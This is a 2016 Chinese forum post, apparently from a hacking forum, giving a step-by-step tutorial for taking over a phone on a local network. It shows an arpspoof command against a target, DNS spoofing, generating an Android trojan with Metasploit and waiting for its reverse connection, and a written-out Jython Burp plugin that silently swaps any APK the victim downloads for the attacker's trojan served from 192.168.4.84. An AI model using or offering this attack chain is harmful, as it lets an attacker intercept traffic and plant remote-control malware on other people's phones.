pasckr 发表于 2016-5-9 14:34:50

内网渗透之手机控制




                                                    从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法





(一)环境:



目标机:192.168.247.130
渗透机kali:192.168.247.129
网关:192.168.247.2





(二)用到的工具:



1.arpspoof
2.dnsspoof
3.burp
4.jython-burp-api (kali里没有集成,需要另外安装,详细请参见:https://github.com/mwielgoszewski/jython-burp-api)





(三)步骤:



1.使用arpspoof来发送arp欺骗包;


[*]arpspoof -i eth0 -t 192.168.247.130 192.168.247.2
2.使用dnsspoof进行dns欺骗;      
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oUXlRA5QCibvGCcNOmMGMVkgrAt20nmhqfQ8EUE6huYbwVOZFMTR3mSQ/0?wx_fmt=jpeg
3.使用msf来生成一个安卓木马;
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oWwpRnjBicd6BbFmQnw5h3K6fFfXoXeibGH3TGvibYgVAX54gQvOQVwj4Q/0?wx_fmt=jpeg
4.msf进行监听,等待木马反弹连接;
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oTfr9ODfCXMEU2ZzPfDrjpJoVc41YFoqEDSicWQILvibKArTN6y50EvLA/0?wx_fmt=jpeg
5.编写python脚本,用于apk下载重定向,代码如下,注意:将这段代码保存到jython-burp-api下的Lib目标下,并命名为testplugin.py;

[*]from gds.burp.api import IProxyRequestHandler

[*]from gds.burp.core import Component, implements

[*]class ExamplePlugin(Component):

[*]implements(IProxyRequestHandler)

[*]def processRequest(self, request):

[*]if ".apk" in request.url.geturl():

[*]print "apk download detected, redirecting"

[*]request.host = "192.168.4.84"

[*]request.raw = ("GET /1.apk HTTP/1.1\r\n" +

[*]"HOST: 192.168.4.84\r\n\r\n")
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9ob3aVJUVm9IuZW9hQiavz6UgCvp4tjibeicSkXQM3uech83yNp2pDu3jtQ/0?wx_fmt=png

6.编辑jython-burp-api中的burp.ini配置文件;         
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oZhqCzeqsK1mVZHrylxze9nw9IpDVDymwMpicAvRNmPKicjdcOPZRpJzA/0?wx_fmt=png

7.启动burp,命令:java -Xmx1g -jar burpsutie.jar
8.对burp进行设置      
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9o5jVXXwvxVk6UFOkKmXlV8KVoVoNhP5mdG9y3ibgYlC55bIs1lPINeeA/0?wx_fmt=png

http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oz457BLzsXzBhpoUh1iatIKSobqlKn5DWShUOzsOUthR5xibf6oFHKPOw/0?wx_fmt=png

9.在burp里加载jython
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oicjI78rLwI6ibGuiaTIYBTUBPo6D31lyJibHVOQwicPygxlTYfopC2vYrpA/0?wx_fmt=png

10.当目标开始下载apk的时候,就会替换为我们指定的apk进行下载      
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9octyr0PQSYaRXOr9aqsR18eUt4GDjKLyZqibrwsFMpickVX7SC0RrGBbg/0?wx_fmt=png

11.这时burp中的jython控制台如下:
                     http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9oDiaGVOaoRA4sKQLoq7eKympXcPQ8M0QyIdB8gebD1Z7J24iarnfjAY3A/0?wx_fmt=png

12.当目标安装并运行下载的apk后msf成功收到反弹;      
http://www.csdn123.net/mydata/showimg.php?url=http://mmbiz.qpic.cn/mmbiz/H6PDE4prcFKT8TevQZmAOoUZIibIg4X9o0HHPB6b89MASOA1Fy9kOGSQmSPloXj5SU6qKmRDiacnMRcpbvXia8Xow/0?wx_fmt=png
页: [1]
查看完整版本: 内网渗透之手机控制